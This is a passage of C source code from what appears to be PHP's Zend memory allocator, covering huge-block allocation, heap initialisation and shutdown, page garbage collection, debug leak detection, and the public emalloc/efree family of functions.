list->dbg.size = dbg_size;
list->dbg.filename = __zend_filename;
list->dbg.orig_filename = __zend_orig_filename;
list->dbg.lineno = __zend_lineno;
list->dbg.orig_lineno = __zend_orig_lineno;
#endif
return;
}
list = list->next;
}
}
static void *zend_mm_alloc_huge(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#ifdef ZEND_WIN32
	/* On Windows we don't have the ability to extend huge blocks in-place.
	 * We allocate them with 2 MB size granularity to avoid many
	 * reallocations when they are extended by small pieces.
	 */
size_t new_size = ZEND_MM_ALIGNED_SIZE_EX(size, MAX(REAL_PAGE_SIZE, ZEND_MM_CHUNK_SIZE));
#else
size_t new_size = ZEND_MM_ALIGNED_SIZE_EX(size, REAL_PAGE_SIZE);
#endif
void *ptr;
#if ZEND_MM_LIMIT
if (UNEXPECTED(heap->real_size + new_size > heap->limit)) {
if (zend_mm_gc(heap) && heap->real_size + new_size <= heap->limit) {
/* pass */
} else if (heap->overflow == 0) {
#if ZEND_DEBUG
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted at %s:%d (tried to allocate %zu bytes)", heap->limit, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Allowed memory size of %zu bytes exhausted (tried to allocate %zu bytes)", heap->limit, size);
#endif
return NULL;
}
}
#endif
ptr = zend_mm_chunk_alloc(heap, new_size, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(ptr == NULL)) {
/* insufficient memory */
if (zend_mm_gc(heap) &&
(ptr = zend_mm_chunk_alloc(heap, new_size, ZEND_MM_CHUNK_SIZE)) != NULL) {
/* pass */
} else {
#if !ZEND_MM_LIMIT
zend_mm_safe_error(heap, "Out of memory");
#elif ZEND_DEBUG
zend_mm_safe_error(heap, "Out of memory (allocated %zu) at %s:%d (tried to allocate %zu bytes)", heap->real_size, __zend_filename, __zend_lineno, size);
#else
zend_mm_safe_error(heap, "Out of memory (allocated %zu) (tried to allocate %zu bytes)", heap->real_size, size);
#endif
return NULL;
}
}
#if ZEND_DEBUG
zend_mm_add_huge_block(heap, ptr, new_size, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#else
zend_mm_add_huge_block(heap, ptr, new_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
#endif
#if ZEND_MM_STAT
do {
size_t size = heap->real_size + new_size;
size_t peak = MAX(heap->real_peak, size);
heap->real_size = size;
heap->real_peak = peak;
} while (0);
do {
size_t size = heap->size + new_size;
size_t peak = MAX(heap->peak, size);
heap->size = size;
heap->peak = peak;
} while (0);
#elif ZEND_MM_LIMIT
heap->real_size += new_size;
#endif
return ptr;
}
static void zend_mm_free_huge(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t size;
ZEND_MM_CHECK(ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE) == 0, "zend_mm_heap corrupted");
size = zend_mm_del_huge_block(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
zend_mm_chunk_free(heap, ptr, size);
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size -= size;
#endif
#if ZEND_MM_STAT
heap->size -= size;
#endif
}
/******************/
/* Initialization */
/******************/
static zend_mm_heap *zend_mm_init(void)
{
zend_mm_chunk *chunk = (zend_mm_chunk*)zend_mm_chunk_alloc_int(ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE);
zend_mm_heap *heap;
if (UNEXPECTED(chunk == NULL)) {
#if ZEND_MM_ERROR
#ifdef _WIN32
stderr_last_error("Can't initialize heap");
#else
fprintf(stderr, "\nCan't initialize heap: [%d] %s\n", errno, strerror(errno));
#endif
#endif
return NULL;
}
heap = &chunk->heap_slot;
chunk->heap = heap;
chunk->next = chunk;
chunk->prev = chunk;
chunk->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
chunk->free_tail = ZEND_MM_FIRST_PAGE;
chunk->num = 0;
chunk->free_map[0] = (Z_L(1) << ZEND_MM_FIRST_PAGE) - 1;
chunk->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
heap->main_chunk = chunk;
heap->cached_chunks = NULL;
heap->chunks_count = 1;
heap->peak_chunks_count = 1;
heap->cached_chunks_count = 0;
heap->avg_chunks_count = 1.0;
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size = ZEND_MM_CHUNK_SIZE;
#endif
#if ZEND_MM_STAT
heap->real_peak = ZEND_MM_CHUNK_SIZE;
heap->size = 0;
heap->peak = 0;
#endif
#if ZEND_MM_LIMIT
heap->limit = (Z_L(-1) >> Z_L(1));
heap->overflow = 0;
#endif
#if ZEND_MM_CUSTOM
heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_NONE;
#endif
#if ZEND_MM_STORAGE
heap->storage = NULL;
#endif
heap->huge_list = NULL;
return heap;
}
ZEND_API size_t zend_mm_gc(zend_mm_heap *heap)
{
zend_mm_free_slot *p, **q;
zend_mm_chunk *chunk;
size_t page_offset;
int page_num;
zend_mm_page_info info;
int i, has_free_pages, free_counter;
size_t collected = 0;
#if ZEND_MM_CUSTOM
if (heap->use_custom_heap) {
return 0;
}
#endif
for (i = 0; i < ZEND_MM_BINS; i++) {
has_free_pages = 0;
p = heap->free_slot[i];
while (p != NULL) {
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(p, ZEND_MM_CHUNK_SIZE);
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
page_offset = ZEND_MM_ALIGNED_OFFSET(p, ZEND_MM_CHUNK_SIZE);
ZEND_ASSERT(page_offset != 0);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
if (info & ZEND_MM_IS_LRUN) {
page_num -= ZEND_MM_NRUN_OFFSET(info);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
ZEND_ASSERT(!(info & ZEND_MM_IS_LRUN));
}
ZEND_ASSERT(ZEND_MM_SRUN_BIN_NUM(info) == i);
free_counter = ZEND_MM_SRUN_FREE_COUNTER(info) + 1;
if (free_counter == bin_elements[i]) {
has_free_pages = 1;
}
			chunk->map[page_num] = ZEND_MM_SRUN_EX(i, free_counter);
p = p->next_free_slot;
}
if (!has_free_pages) {
continue;
}
q = &heap->free_slot[i];
p = *q;
while (p != NULL) {
chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(p, ZEND_MM_CHUNK_SIZE);
ZEND_MM_CHECK(chunk->heap == heap, "zend_mm_heap corrupted");
page_offset = ZEND_MM_ALIGNED_OFFSET(p, ZEND_MM_CHUNK_SIZE);
ZEND_ASSERT(page_offset != 0);
page_num = (int)(page_offset / ZEND_MM_PAGE_SIZE);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
if (info & ZEND_MM_IS_LRUN) {
page_num -= ZEND_MM_NRUN_OFFSET(info);
info = chunk->map[page_num];
ZEND_ASSERT(info & ZEND_MM_IS_SRUN);
ZEND_ASSERT(!(info & ZEND_MM_IS_LRUN));
}
ZEND_ASSERT(ZEND_MM_SRUN_BIN_NUM(info) == i);
if (ZEND_MM_SRUN_FREE_COUNTER(info) == bin_elements[i]) {
/* remove from cache */
				p = p->next_free_slot;
*q = p;
} else {
q = &p->next_free_slot;
p = *q;
}
}
}
chunk = heap->main_chunk;
do {
i = ZEND_MM_FIRST_PAGE;
while (i < chunk->free_tail) {
if (zend_mm_bitset_is_set(chunk->free_map, i)) {
info = chunk->map[i];
if (info & ZEND_MM_IS_SRUN) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(info);
int pages_count = bin_pages[bin_num];
if (ZEND_MM_SRUN_FREE_COUNTER(info) == bin_elements[bin_num]) {
					/* all elements are free */
zend_mm_free_pages_ex(heap, chunk, i, pages_count, 0);
collected += pages_count;
} else {
/* reset counter */
chunk->map[i] = ZEND_MM_SRUN(bin_num);
}
i += bin_pages[bin_num];
} else /* if (info & ZEND_MM_IS_LRUN) */ {
i += ZEND_MM_LRUN_PAGES(info);
}
} else {
i++;
}
}
if (chunk->free_pages == ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE) {
zend_mm_chunk *next_chunk = chunk->next;
zend_mm_delete_chunk(heap, chunk);
chunk = next_chunk;
} else {
chunk = chunk->next;
}
} while (chunk != heap->main_chunk);
return collected * ZEND_MM_PAGE_SIZE;
}
#if ZEND_DEBUG
/******************/
/* Leak detection */
/******************/
static zend_long zend_mm_find_leaks_small(zend_mm_chunk *p, int i, int j, zend_leak_info *leak)
{
int empty = 1;
zend_long count = 0;
int bin_num = ZEND_MM_SRUN_BIN_NUM(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * i + bin_data_size[bin_num] * (j + 1) - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
while (j < bin_elements[bin_num]) {
if (dbg->size != 0) {
if (dbg->filename == leak->filename && dbg->lineno == leak->lineno) {
count++;
dbg->size = 0;
dbg->filename = NULL;
dbg->lineno = 0;
} else {
empty = 0;
}
}
j++;
dbg = (zend_mm_debug_info*)((char*)dbg + bin_data_size[bin_num]);
}
if (empty) {
zend_mm_bitset_reset_range(p->free_map, i, bin_pages[bin_num]);
}
return count;
}
static zend_long zend_mm_find_leaks(zend_mm_heap *heap, zend_mm_chunk *p, int i, zend_leak_info *leak)
{
zend_long count = 0;
do {
while (i < p->free_tail) {
if (zend_mm_bitset_is_set(p->free_map, i)) {
if (p->map[i] & ZEND_MM_IS_SRUN) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(p->map[i]);
count += zend_mm_find_leaks_small(p, i, 0, leak);
i += bin_pages[bin_num];
} else /* if (p->map[i] & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * (i + pages_count) - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
if (dbg->filename == leak->filename && dbg->lineno == leak->lineno) {
count++;
}
zend_mm_bitset_reset_range(p->free_map, i, pages_count);
i += pages_count;
}
} else {
i++;
}
}
p = p->next;
} while (p != heap->main_chunk);
return count;
}
static zend_long zend_mm_find_leaks_huge(zend_mm_heap *heap, zend_mm_huge_list *list)
{
zend_long count = 0;
zend_mm_huge_list *prev = list;
zend_mm_huge_list *p = list->next;
while (p) {
if (p->dbg.filename == list->dbg.filename && p->dbg.lineno == list->dbg.lineno) {
prev->next = p->next;
zend_mm_chunk_free(heap, p->ptr, p->size);
zend_mm_free_heap(heap, p, NULL, 0, NULL, 0);
count++;
} else {
prev = p;
}
p = prev->next;
}
return count;
}
static void zend_mm_check_leaks(zend_mm_heap *heap)
{
zend_mm_huge_list *list;
zend_mm_chunk *p;
zend_leak_info leak;
zend_long repeated = 0;
uint32_t total = 0;
int i, j;
/* find leaked huge blocks and free them */
list = heap->huge_list;
while (list) {
zend_mm_huge_list *q = list;
leak.addr = list->ptr;
leak.size = list->dbg.size;
leak.filename = list->dbg.filename;
leak.orig_filename = list->dbg.orig_filename;
leak.lineno = list->dbg.lineno;
leak.orig_lineno = list->dbg.orig_lineno;
zend_message_dispatcher(ZMSG_LOG_SCRIPT_NAME, NULL);
zend_message_dispatcher(ZMSG_MEMORY_LEAK_DETECTED, &leak);
repeated = zend_mm_find_leaks_huge(heap, list);
total += 1 + repeated;
if (repeated) {
zend_message_dispatcher(ZMSG_MEMORY_LEAK_REPEATED, (void *)(zend_uintptr_t)repeated);
}
heap->huge_list = list = list->next;
zend_mm_chunk_free(heap, q->ptr, q->size);
zend_mm_free_heap(heap, q, NULL, 0, NULL, 0);
}
/* for each chunk */
p = heap->main_chunk;
do {
i = ZEND_MM_FIRST_PAGE;
while (i < p->free_tail) {
if (zend_mm_bitset_is_set(p->free_map, i)) {
if (p->map[i] & ZEND_MM_IS_SRUN) {
int bin_num = ZEND_MM_SRUN_BIN_NUM(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * i + bin_data_size[bin_num] - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
j = 0;
while (j < bin_elements[bin_num]) {
if (dbg->size != 0) {
leak.addr = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * i + bin_data_size[bin_num] * j);
leak.size = dbg->size;
leak.filename = dbg->filename;
leak.orig_filename = dbg->orig_filename;
leak.lineno = dbg->lineno;
leak.orig_lineno = dbg->orig_lineno;
zend_message_dispatcher(ZMSG_LOG_SCRIPT_NAME, NULL);
zend_message_dispatcher(ZMSG_MEMORY_LEAK_DETECTED, &leak);
dbg->size = 0;
dbg->filename = NULL;
dbg->lineno = 0;
repeated = zend_mm_find_leaks_small(p, i, j + 1, &leak) +
zend_mm_find_leaks(heap, p, i + bin_pages[bin_num], &leak);
total += 1 + repeated;
if (repeated) {
zend_message_dispatcher(ZMSG_MEMORY_LEAK_REPEATED, (void *)(zend_uintptr_t)repeated);
}
}
dbg = (zend_mm_debug_info*)((char*)dbg + bin_data_size[bin_num]);
j++;
}
i += bin_pages[bin_num];
} else /* if (p->map[i] & ZEND_MM_IS_LRUN) */ {
int pages_count = ZEND_MM_LRUN_PAGES(p->map[i]);
zend_mm_debug_info *dbg = (zend_mm_debug_info*)((char*)p + ZEND_MM_PAGE_SIZE * (i + pages_count) - ZEND_MM_ALIGNED_SIZE(sizeof(zend_mm_debug_info)));
leak.addr = (void*)((char*)p + ZEND_MM_PAGE_SIZE * i);
leak.size = dbg->size;
leak.filename = dbg->filename;
leak.orig_filename = dbg->orig_filename;
leak.lineno = dbg->lineno;
leak.orig_lineno = dbg->orig_lineno;
zend_message_dispatcher(ZMSG_LOG_SCRIPT_NAME, NULL);
zend_message_dispatcher(ZMSG_MEMORY_LEAK_DETECTED, &leak);
zend_mm_bitset_reset_range(p->free_map, i, pages_count);
repeated = zend_mm_find_leaks(heap, p, i + pages_count, &leak);
total += 1 + repeated;
if (repeated) {
zend_message_dispatcher(ZMSG_MEMORY_LEAK_REPEATED, (void *)(zend_uintptr_t)repeated);
}
i += pages_count;
}
} else {
i++;
}
}
p = p->next;
} while (p != heap->main_chunk);
if (total) {
zend_message_dispatcher(ZMSG_MEMORY_LEAKS_GRAND_TOTAL, &total);
}
}
#endif
void zend_mm_shutdown(zend_mm_heap *heap, int full, int silent)
{
zend_mm_chunk *p;
zend_mm_huge_list *list;
#if ZEND_MM_CUSTOM
if (heap->use_custom_heap) {
if (full) {
if (ZEND_DEBUG && heap->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
heap->custom_heap.debug._free(heap ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC);
} else {
heap->custom_heap.std._free(heap);
}
}
return;
}
#endif
#if ZEND_DEBUG
if (!silent) {
zend_mm_check_leaks(heap);
}
#endif
/* free huge blocks */
list = heap->huge_list;
heap->huge_list = NULL;
while (list) {
zend_mm_huge_list *q = list;
list = list->next;
zend_mm_chunk_free(heap, q->ptr, q->size);
}
/* move all chunks except the first one into the cache */
p = heap->main_chunk->next;
while (p != heap->main_chunk) {
zend_mm_chunk *q = p->next;
p->next = heap->cached_chunks;
heap->cached_chunks = p;
p = q;
heap->chunks_count--;
heap->cached_chunks_count++;
}
if (full) {
/* free all cached chunks */
while (heap->cached_chunks) {
p = heap->cached_chunks;
heap->cached_chunks = p->next;
zend_mm_chunk_free(heap, p, ZEND_MM_CHUNK_SIZE);
}
/* free the first chunk */
zend_mm_chunk_free(heap, heap->main_chunk, ZEND_MM_CHUNK_SIZE);
} else {
zend_mm_heap old_heap;
/* free some cached chunks to keep average count */
heap->avg_chunks_count = (heap->avg_chunks_count + (double)heap->peak_chunks_count) / 2.0;
while ((double)heap->cached_chunks_count + 0.9 > heap->avg_chunks_count &&
heap->cached_chunks) {
p = heap->cached_chunks;
heap->cached_chunks = p->next;
zend_mm_chunk_free(heap, p, ZEND_MM_CHUNK_SIZE);
heap->cached_chunks_count--;
}
/* clear cached chunks */
p = heap->cached_chunks;
while (p != NULL) {
zend_mm_chunk *q = p->next;
memset(p, 0, sizeof(zend_mm_chunk));
p->next = q;
p = q;
}
/* reinitialize the first chunk and heap */
old_heap = *heap;
p = heap->main_chunk;
memset(p, 0, ZEND_MM_FIRST_PAGE * ZEND_MM_PAGE_SIZE);
*heap = old_heap;
memset(heap->free_slot, 0, sizeof(heap->free_slot));
heap->main_chunk = p;
p->heap = &p->heap_slot;
p->next = p;
p->prev = p;
p->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
p->free_tail = ZEND_MM_FIRST_PAGE;
p->free_map[0] = (1L << ZEND_MM_FIRST_PAGE) - 1;
p->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
heap->chunks_count = 1;
heap->peak_chunks_count = 1;
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size = ZEND_MM_CHUNK_SIZE;
#endif
#if ZEND_MM_STAT
heap->real_peak = ZEND_MM_CHUNK_SIZE;
heap->size = heap->peak = 0;
#endif
}
}
/**************/
/* PUBLIC API */
/**************/
ZEND_API void* ZEND_FASTCALL _zend_mm_alloc(zend_mm_heap *heap, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_alloc_heap(heap, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void ZEND_FASTCALL _zend_mm_free(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
zend_mm_free_heap(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
void* ZEND_FASTCALL _zend_mm_realloc(zend_mm_heap *heap, void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_realloc_heap(heap, ptr, size, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
void* ZEND_FASTCALL _zend_mm_realloc2(zend_mm_heap *heap, void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_realloc_heap(heap, ptr, size, copy_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API size_t ZEND_FASTCALL _zend_mm_block_size(zend_mm_heap *heap, void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return zend_mm_size(heap, ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
/**********************/
/* Allocation Manager */
/**********************/
typedef struct _zend_alloc_globals {
zend_mm_heap *mm_heap;
} zend_alloc_globals;
#ifdef ZTS
static int alloc_globals_id;
# define AG(v) ZEND_TSRMG(alloc_globals_id, zend_alloc_globals *, v)
#else
# define AG(v) (alloc_globals.v)
static zend_alloc_globals alloc_globals;
#endif
ZEND_API int is_zend_mm(void)
{
#if ZEND_MM_CUSTOM
return !AG(mm_heap)->use_custom_heap;
#else
return 1;
#endif
}
#if !ZEND_DEBUG && (!defined(_WIN32) || defined(__clang__))
#undef _emalloc
#if ZEND_MM_CUSTOM
# define ZEND_MM_CUSTOM_ALLOCATOR(size) do { \
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { \
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { \
return AG(mm_heap)->custom_heap.debug._malloc(size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC); \
} else { \
return AG(mm_heap)->custom_heap.std._malloc(size); \
} \
} \
} while (0)
# define ZEND_MM_CUSTOM_DEALLOCATOR(ptr) do { \
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) { \
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) { \
AG(mm_heap)->custom_heap.debug._free(ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC); \
} else { \
AG(mm_heap)->custom_heap.std._free(ptr); \
} \
return; \
} \
} while (0)
#else
# define ZEND_MM_CUSTOM_ALLOCATOR(size)
# define ZEND_MM_CUSTOM_DEALLOCATOR(ptr)
#endif
# define _ZEND_BIN_ALLOCATOR(_num, _size, _elements, _pages, x, y) \
ZEND_API void* ZEND_FASTCALL _emalloc_ ## _size(void) { \
ZEND_MM_CUSTOM_ALLOCATOR(_size); \
return zend_mm_alloc_small(AG(mm_heap), _size, _num ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC); \
}
ZEND_MM_BINS_INFO(_ZEND_BIN_ALLOCATOR, x, y)
ZEND_API void* ZEND_FASTCALL _emalloc_large(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
ZEND_MM_CUSTOM_ALLOCATOR(size);
return zend_mm_alloc_large(AG(mm_heap), size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void* ZEND_FASTCALL _emalloc_huge(size_t size)
{
ZEND_MM_CUSTOM_ALLOCATOR(size);
return zend_mm_alloc_huge(AG(mm_heap), size);
}
#if ZEND_DEBUG
# define _ZEND_BIN_FREE(_num, _size, _elements, _pages, x, y) \
ZEND_API void ZEND_FASTCALL _efree_ ## _size(void *ptr) { \
ZEND_MM_CUSTOM_DEALLOCATOR(ptr); \
{ \
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE); \
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE); \
int page_num = page_offset / ZEND_MM_PAGE_SIZE; \
ZEND_MM_CHECK(chunk->heap == AG(mm_heap), "zend_mm_heap corrupted"); \
ZEND_ASSERT(chunk->map[page_num] & ZEND_MM_IS_SRUN); \
ZEND_ASSERT(ZEND_MM_SRUN_BIN_NUM(chunk->map[page_num]) == _num); \
zend_mm_free_small(AG(mm_heap), ptr, _num); \
} \
}
#else
# define _ZEND_BIN_FREE(_num, _size, _elements, _pages, x, y) \
ZEND_API void ZEND_FASTCALL _efree_ ## _size(void *ptr) { \
ZEND_MM_CUSTOM_DEALLOCATOR(ptr); \
{ \
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE); \
ZEND_MM_CHECK(chunk->heap == AG(mm_heap), "zend_mm_heap corrupted"); \
zend_mm_free_small(AG(mm_heap), ptr, _num); \
} \
}
#endif
ZEND_MM_BINS_INFO(_ZEND_BIN_FREE, x, y)
ZEND_API void ZEND_FASTCALL _efree_large(void *ptr, size_t size)
{
ZEND_MM_CUSTOM_DEALLOCATOR(ptr);
{
size_t page_offset = ZEND_MM_ALIGNED_OFFSET(ptr, ZEND_MM_CHUNK_SIZE);
zend_mm_chunk *chunk = (zend_mm_chunk*)ZEND_MM_ALIGNED_BASE(ptr, ZEND_MM_CHUNK_SIZE);
int page_num = page_offset / ZEND_MM_PAGE_SIZE;
int pages_count = ZEND_MM_ALIGNED_SIZE_EX(size, ZEND_MM_PAGE_SIZE) / ZEND_MM_PAGE_SIZE;
ZEND_MM_CHECK(chunk->heap == AG(mm_heap) && ZEND_MM_ALIGNED_OFFSET(page_offset, ZEND_MM_PAGE_SIZE) == 0, "zend_mm_heap corrupted");
ZEND_ASSERT(chunk->map[page_num] & ZEND_MM_IS_LRUN);
ZEND_ASSERT(ZEND_MM_LRUN_PAGES(chunk->map[page_num]) == pages_count);
zend_mm_free_large(AG(mm_heap), chunk, page_num, pages_count);
}
}
ZEND_API void ZEND_FASTCALL _efree_huge(void *ptr, size_t size)
{
ZEND_MM_CUSTOM_DEALLOCATOR(ptr);
zend_mm_free_huge(AG(mm_heap), ptr);
}
#endif
ZEND_API void* ZEND_FASTCALL _emalloc(size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#if ZEND_MM_CUSTOM
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
return AG(mm_heap)->custom_heap.debug._malloc(size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
return AG(mm_heap)->custom_heap.std._malloc(size);
}
}
#endif
return zend_mm_alloc_heap(AG(mm_heap), size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void ZEND_FASTCALL _efree(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
#if ZEND_MM_CUSTOM
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
AG(mm_heap)->custom_heap.debug._free(ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
AG(mm_heap)->custom_heap.std._free(ptr);
}
return;
}
#endif
zend_mm_free_heap(AG(mm_heap), ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void* ZEND_FASTCALL _erealloc(void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
return AG(mm_heap)->custom_heap.debug._realloc(ptr, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
return AG(mm_heap)->custom_heap.std._realloc(ptr, size);
}
}
return zend_mm_realloc_heap(AG(mm_heap), ptr, size, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API void* ZEND_FASTCALL _erealloc2(void *ptr, size_t size, size_t copy_size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
if (ZEND_DEBUG && AG(mm_heap)->use_custom_heap == ZEND_MM_CUSTOM_HEAP_DEBUG) {
return AG(mm_heap)->custom_heap.debug._realloc(ptr, size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
} else {
return AG(mm_heap)->custom_heap.std._realloc(ptr, size);
}
}
return zend_mm_realloc_heap(AG(mm_heap), ptr, size, copy_size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
ZEND_API size_t ZEND_FASTCALL _zend_mem_block_size(void *ptr ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
if (UNEXPECTED(AG(mm_heap)->use_custom_heap)) {
return 0;
}
return zend_mm_size(AG(mm_heap), ptr ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
}
static zend_always_inline size_t safe_address(size_t nmemb, size_t size, size_t offset)
{
int overflow;
size_t ret = zend_safe_address(nmemb, size, offset, &overflow);
if (UNEXPECTED(overflow)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nmemb, size, offset);
return 0;
}
return ret;
}
ZEND_API void* ZEND_FASTCALL _safe_emalloc(size_t nmemb, size_t size, size_t offset ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return emalloc_rel(safe_address(nmemb, size, offset));
}
ZEND_API void* ZEND_FASTCALL _safe_malloc(size_t nmemb, size_t size, size_t offset)
{
return pemalloc(safe_address(nmemb, size, offset), 1);
}
ZEND_API void* ZEND_FASTCALL _safe_erealloc(void *ptr, size_t nmemb, size_t size, size_t offset ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
return erealloc_rel(ptr, safe_address(nmemb, size, offset));
}
ZEND_API void* ZEND_FASTCALL _safe_realloc(void *ptr, size_t nmemb, size_t size, size_t offset)
{
return perealloc(ptr, safe_address(nmemb, size, offset), 1);
}
ZEND_API void* ZEND_FASTCALL _ecalloc(size_t nmemb, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
void *p;
p = _safe_emalloc(nmemb, size, 0 ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
if (UNEXPECTED(p == NULL)) {
return p;
}
memset(p, 0, size * nmemb);
return p;
}
ZEND_API char* ZEND_FASTCALL _estrdup(const char *s ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC)
{
size_t length;
char *p;
length = strlen(s);
if (UNEXPECTED(length + 1 == 0)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", 1, length, 1);
}
p = (char *) _emalloc(length + 1 ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
if (UNEXPECTED(p == NULL)) {
return p;
}
memcpy(p, s, length+1);
return p;
}
